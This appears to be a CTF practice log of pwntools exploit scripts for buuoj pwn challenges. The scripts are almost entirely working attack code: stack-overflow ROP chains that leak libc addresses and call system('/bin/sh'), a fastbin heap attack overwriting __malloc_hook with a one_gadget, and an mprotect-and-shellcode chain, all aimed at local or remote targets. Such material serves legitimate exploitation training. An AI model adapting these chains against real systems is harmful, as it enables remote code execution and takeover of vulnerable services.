
buuoj刷题pwn部分

2019/11/18

warmup_csaw_2016

exp1:

from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

# file_name=ELF("./")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
# Python 2 pwntools script (print statement, str payloads).
# Usage: `python exp.py REMOTE host port` connects to a remote service;
# otherwise the local binary is spawned.
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./warmup_csaw_2016")


# The program prints a value after "WOW:0x"; the next 6 hex digits are
# parsed as an integer. NOTE(review): despite its name, `flag` is the
# value that ends up as the final qword of the payload below (presumably
# an address), not the challenge flag.
sh.recvuntil("WOW:0x")
flag = int(sh.recv(6),16)
print hex(flag)

# 0x40 + 8 bytes of filler, then the value read above packed as 64-bit.
payload = "a"*0x40 + 'b'*8 + p64(flag)
sh.sendafter(">",payload)

sh.interactive()
# NOTE(review): interactive() returns when the session ends, so this recv()
# normally runs against a closed connection and raises EOFError.
print(sh.recv())

exp2:

from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
context.arch='amd64'

# Python 2 pwntools script (print statement, str payloads).
# Usage: `python exp.py REMOTE host port` connects to a remote service;
# otherwise the local binary is spawned.
elf=ELF("./warmup_csaw_2016")
#libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./warmup_csaw_2016")


# Gadget addresses are specific to this build of the binary.
p_rdi_ret = 0x0000000000400713
p_rsi_r15_ret = 0x0000000000400711
# The 6 hex digits printed after "WOW:0x" are read and logged but not used
# further in this version of the script.
sh.recvuntil("WOW:0x")
flag = int(sh.recv(6),16)
print hex(flag)

# Stage 1: filler, then write(1, &got['write'], <rdx unchanged>) via the
# PLT, returning to 0x40061D afterwards. The p64(0) fills r15, which the
# pop rsi; pop r15; ret gadget also pops.
payload = "a"*0x40 + 'b'*8
payload += p64(p_rdi_ret) + p64(1) + p64(p_rsi_r15_ret) + p64(elf.got['write']) + p64(0)
payload += p64(elf.plt['write']) + p64(0x00000000040061D)
sh.sendlineafter(">",payload)

# First 6 bytes of the leaked pointer, zero-extended to 8.
libc_write = u64(sh.recv(6).ljust(8,"\x00"))
print "libc_write=>" + hex(libc_write)
# LibcSearcher picks a libc build from the low bits of one symbol; it can
# return several candidates and prompt for a choice.
libc = LibcSearcher("write",libc_write)

libc_base = libc_write - libc.dump("write")
system = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
# Stage 2: system(binsh); the second copy of `system` is the return address.
payload = "a"*0x40 + 'b'*8
payload += p64(p_rdi_ret) + p64(binsh) + p64(system)*2
sh.sendlineafter(">",payload)


sh.interactive()
# NOTE(review): interactive() returns when the session ends, so this recv()
# normally runs against a closed connection and raises EOFError.
print(sh.recv())

ciscn_2019_c_1

from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

# Python 2 pwntools script. libc offsets are taken from the local
# /lib/x86_64-linux-gnu/libc.so.6, so they only hold if the target runs
# the same libc build.
elf=ELF("./ciscn_2019_c_1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./ciscn_2019_c_1")

# Gadget addresses are specific to this build of the binary.
p_rdi_ret = 0x0000000000400c83
p_rsi_r15_ret = 0x0000000000400c81

# Choose menu option 1 (the prompt ends in "!\n").
sh.sendlineafter("!\n","1")

# 0x50 + 8 bytes of filler ("pading" sic), then puts(&got['puts']) via the
# PLT, returning to 0x4009A0.
pading = "a"*0x50 + "b"*8
payload = pading + p64(p_rdi_ret) + p64(elf.got['puts'])
payload += p64(elf.plt['puts']) + p64(0x0000000004009A0)
sh.recvuntil("encrypted\n")
sh.sendline(payload)
# Wait for the bytes 83 0c 40 (little-endian p_rdi_ret, presumably printed
# back by the program) plus a newline, then read the 6-byte leak.
sh.recvuntil("\x83\x0c\x40\x0a")
libc_puts = u64(sh.recv(6).ljust(8,"\x00"))
libc_offset = libc_puts - libc.sym['puts']

system = libc_offset + libc.sym['system']
# `.next()` on the search generator is Python 2 only (Python 3: next(...)).
binsh = libc_offset + libc.search("/bin/sh").next()
sh.recvuntil("encrypted\n")
# Second payload: system(binsh) with 0 as system's return address.
payload2 = pading + p64(p_rdi_ret) + p64(binsh) + p64(system) + p64(0)
sh.sendline(payload2)

sh.interactive()
# NOTE(review): interactive() returns when the session ends, so this recv()
# normally runs against a closed connection and raises EOFError.
print(sh.recv())

pwn1_sctf_2016

from pwn import *
from LibcSearcher import *
context.log_level='debug'

# NOTE(review): `sys` is not imported explicitly here; it is only available
# because `from pwn import *` re-exports it.
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./pwn1_sctf_2016")

# 20 "I" characters, 4 filler bytes, then the 32-bit address 0x08048F0D.
# NOTE(review): the choice of "I" is presumably significant to how the
# binary processes its input; it is not evident from this script alone.
payload="I"*20 +"a"*4+ p32(0x08048F0D)

sh.sendline(payload)
sh.interactive()

ciscn_2019_n_1

from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

# Python 2 pwntools script. libc offsets are taken from the local
# /lib/x86_64-linux-gnu/libc.so.6, so they only hold if the target runs
# the same libc build.
elf=ELF("./ciscn_2019_n_1")
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./ciscn_2019_n_1")

# 0x30 + 8 bytes of filler ("pading" sic); gadget addresses are specific
# to this build of the binary.
pading = "a"*0x30 + 'b'*8
p_rdi_ret = 0x0000000000400793
p_rsi_r15_ret = 0x0000000000400791

# Round 1: puts(&got['puts']) via the PLT, then return into the binary's
# own `func` so a second input can be sent.
payload=pading + p64(p_rdi_ret) + p64(elf.got['puts'])
payload += p64(elf.plt['puts']) + p64(elf.sym['func'])


sh.recvuntil("number.\n")
sh.sendline(payload)
# Wait for "125\n" (bytes 31 32 35 0a) before reading the leak.
sh.recvuntil("\x31\x32\x35\x0a")

# First 6 bytes of the leaked pointer, zero-extended to 8.
libc_puts = u64(sh.recv(6).ljust(8,"\x00"))
libc_base = libc_puts - libc.sym['puts']

system = libc_base + libc.sym['system']
# `.next()` on the search generator is Python 2 only (Python 3: next(...)).
binsh = libc_base + libc.search("/bin/sh").next()
# Round 2: system(binsh), again returning into `func`.
payload=pading + p64(p_rdi_ret) + p64(binsh)
payload += p64(system) + p64(elf.sym['func'])
sh.recvuntil("number.\n")
sh.sendline(payload)

sh.interactive()
# NOTE(review): interactive() returns when the session ends, so this recv()
# normally runs against a closed connection and raises EOFError.
print(sh.recv())

babyheap_0ctf_2017

from pwn import *
context.log_level='debug'
# context.arch='amd64'

# Python 2 pwntools script (print statement, str payloads). Offsets used
# below are for the bundled ./libc.so.6 only.
# NOTE(review): `sys` is not imported explicitly; it is only available
# because `from pwn import *` re-exports it.
elf=ELF("./babyheap_0ctf_2017")
libc=ELF("./libc.so.6")

if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./babyheap_0ctf_2017")
def create(Size):
    """Menu option 1: allocate a chunk of *Size* bytes (Size is coerced via int()).

    Each reply is produced only after its prompt has arrived, matching the
    program's prompt/answer order.
    """
    steps = (("Command: ", lambda: "1"), ("Size: ", lambda: str(int(Size))))
    for prompt, answer in steps:
        sh.recvuntil(prompt)
        sh.sendline(answer())
def edit(Index,Size,Content):
    """Menu option 2: write *Size* bytes of *Content* into chunk *Index*.

    Index and Size are sent as text lines; Content is sent raw with
    sh.send (no trailing newline appended).
    """
    replies = (
        ("Command: ", lambda: "2", sh.sendline),
        ("Index: ", lambda: str(Index), sh.sendline),
        ("Size: ", lambda: str(int(Size)), sh.sendline),
        ("Content: ", lambda: Content, sh.send),
    )
    for prompt, value, emit in replies:
        sh.recvuntil(prompt)
        emit(value())
def delete(Index):
    """Menu option 3: free chunk *Index*."""
    for prompt, answer in (("Command: ", "3"), ("Index: ", str(Index))):
        sh.recvuntil(prompt)
        sh.sendline(answer)
def show(Index):
    """Menu option 4: print the contents of chunk *Index*."""
    for prompt, answer in (("Command: ", "4"), ("Index: ", str(Index))):
        sh.recvuntil(prompt)
        sh.sendline(answer)

create(0x10) #0
create(0x10) #1
create(0x80) #2
create(0x10) #3

# Each edit writes 0x20 bytes into a 0x10-byte chunk: three zero qwords,
# then a size value (0x41 / 0x71 / 0x91) that presumably lands on the
# following chunk's size field.
edit(0,0x20,p64(0)*3+p64(0x41))
edit(2,0x20,p64(0)*3+p64(0x71))
delete(1)
create(0x30) #1
edit(1,0x20,p64(0)*3+p64(0x91))
delete(2)
show(1)
# The leaked pointer follows the 0x91 size field in the dump; 6 bytes,
# zero-extended to 8.
sh.recvuntil("\x91"+"\x00"*7)
leak=u64(sh.recv(6).ljust(8,"\x00"))
print "leak=>" + hex(leak)
# 0x3c4b78 is the distance from the leaked pointer to libc base for the
# bundled libc.so.6 only.
libc_base = leak-0x3c4b78
malloc_hook = libc_base+libc.sym['__malloc_hook']
print "malloc_hook=>" + hex(malloc_hook)
create(0x60)#2
delete(2)
# Rewrite chunk 1 again, this time also placing malloc_hook-35 after the
# 0x71 size field.
edit(1,0x28,p64(0)*3+p64(0x71)+p64(malloc_hook-35))
create(0x60)#2
create(0x60)#4 -- slot 3 is still allocated (never freed), so this lands in
               #   slot 4, which is what edit(4, ...) below targets
# one_gadget offsets for the bundled libc; index 1 is the one used.
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
one = libc_base + one_gadget[1]
# 19 filler bytes then the gadget address, written into slot 4.
edit(4,27,"a"*19 + p64(one))
create(0x10) #5 -- the allocation that presumably goes through the
             #   overwritten __malloc_hook
#gdb.attach(sh)
sh.interactive()
# NOTE(review): interactive() returns when the session ends, so this recv()
# normally runs against a closed connection and raises EOFError.
print(sh.recv())

[OGeek2019]babyrop

from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

# Python 2 pwntools script, 32-bit target. libc offsets come from the local
# /lib32/libc.so.6 and only hold if the target runs the same build.
elf=ELF("./pwn")
libc=ELF("/lib32/libc.so.6")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./pwn")

# First input: a leading NUL followed by 19 0xff bytes; the program answers
# "Correct\n" before reading the next input.
sh.sendline("\0"+"\xff"*19)
sh.recvuntil("Correct\n")
# 0xE7 + 4 bytes of filler, then puts(&got['puts']) via the PLT, returning
# to 0x08048825.
payload = "a"*0xE7+'bbbb'
payload += p32(elf.plt['puts']) + p32(0x08048825) + p32(elf.got['puts'])

sh.sendline(payload)
# The leak is read as exactly 4 raw bytes.
libc_puts = u32(sh.recv(4))
libc_base = libc_puts-libc.sym['puts']
system = libc_base + libc.sym['system']
# `.next()` on the search generator is Python 2 only (Python 3: next(...)).
binsh = libc_base + libc.search("/bin/sh").next()


# Second round: same first input, then system(binsh) with 'bbbb' as
# system's return address.
sh.sendline("\0"+"\xff"*19)
sh.recvuntil("Correct\n")
payload = "a"*0xE7+'bbbb' + p32(system) + 'bbbb'+ p32(binsh)
sh.sendline(payload)

sh.interactive()
# NOTE(review): interactive() returns when the session ends, so this recv()
# normally runs against a closed connection and raises EOFError.
print(sh.recv())

get_started_3dsctf_2016

from pwn import *
import sys
from LibcSearcher import *
context.log_level='debug'
# context.arch='amd64'

# Python 2 pwntools script, 32-bit target. mprotect and read are looked up
# in the binary's own symbol table, which suggests a static build
# (NOTE(review): confirm).
elf=ELF("./get_started_3dsctf_2016")
# libc=ELF("./")
# ELF("/lib/x86_64-linux-gnu/libc.so.6")
if args['REMOTE']:
    sh = remote(sys.argv[1], sys.argv[2])
else:
    sh = process("./get_started_3dsctf_2016")


# Build-specific gadget used as the return address of each call so its
# three arguments are popped off the stack before the next call.
p3_ret = 0x0804f460
# mprotect(0x80eb000, 0x3000, 7) ...
payload="a"*0x38 + p32(elf.symbols['mprotect'])
payload += p32(p3_ret) + p32(0x80eb000) + p32(0x3000) + p32(7)
# ... then read(0, 0x80ebf80, 0x200), returning into 0x80ebf80 -- the
# buffer filled by the second sendline below.
payload += p32(elf.symbols['read']) + p32(p3_ret) + p32(0) + p32(0x80ebf80) + p32(0x200) + p32(0x80ebf80)

sh.sendline(payload)
# Second line: pwntools' shell shellcode, assembled for context.arch (left
# at the pwntools default here since the amd64 line above is commented out).
sh.sendline(asm(shellcraft.sh()))
sh.interactive()
# NOTE(review): interactive() returns when the session ends, so this recv()
# normally runs against a closed connection and raises EOFError.
print(sh.recv())